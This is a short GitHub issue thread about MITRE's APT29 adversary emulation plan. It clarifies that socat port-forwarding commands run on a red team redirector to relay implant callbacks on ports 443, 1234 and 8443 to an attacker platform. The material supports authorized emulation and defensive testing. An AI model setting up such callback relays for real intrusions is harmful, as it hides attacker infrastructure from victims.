Closed holisticinfosec closed 3 years ago
jcwilliamsATmitre
commented
3 years ago hey @holisticinfosec!
These port forwarding commands are intended to be run on the redirector (192.168.0.5) in order to forward any callbacks over those 3 ports to the attacker platform (192.168.0.4). Hopefully that clarifies the confusion!
holisticinfosec
commented
3 years ago Derp, gotcha. ID 10 T error. Thank you!
On Mon, Aug 10, 2020 at 8:37 PM jcwilliamsATmitre notifications@github.com wrote:
hey @holisticinfosec https://github.com/holisticinfosec!
These port forwarding commands are intended to be run on the redirector (192.168.0.5) in order to forward any callbacks over those 3 ports to the attacker platform (192.168.0.4). Hopefully that clarifies the confusion!
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/mitre-attack/attack-arsenal/issues/16#issuecomment-671705373, or unsubscribe https://github.com/notifications/unsubscribe-auth/AAKTM56ZKIZJQOZTZRZYP4TSAC4IDANCNFSM4P2MCM4A .
-- Russ McRee GSE http://www.giac.org/certified-professional/russ-mcree/106487, MSISE, CISSP @holisticinfosec https://twitter.com/holisticinfosec http://holisticinfosec.org http://blog.holisticinfosec.org
For APT29 Day Emulation Plan, under Red Team setup, it currently reads: Setup Redirector: 192.168.0.5 (or the value used for the Redirector IP) From the redirector system, setup port forwarding using Socat sudo socat TCP-LISTEN:443,fork TCP:192.168.0.4:443 & sudo socat TCP-LISTEN:1234,fork TCP:192.168.0.4:1234 & sudo socat TCP-LISTEN:8443,fork TCP:192.168.0.4:8443 & I believe it should read: sudo socat TCP-LISTEN:443,fork TCP:192.168.0.5:443 & sudo socat TCP-LISTEN:1234,fork TCP:192.168.0.5:1234 & sudo socat TCP-LISTEN:8443,fork TCP:192.168.0.5:8443 &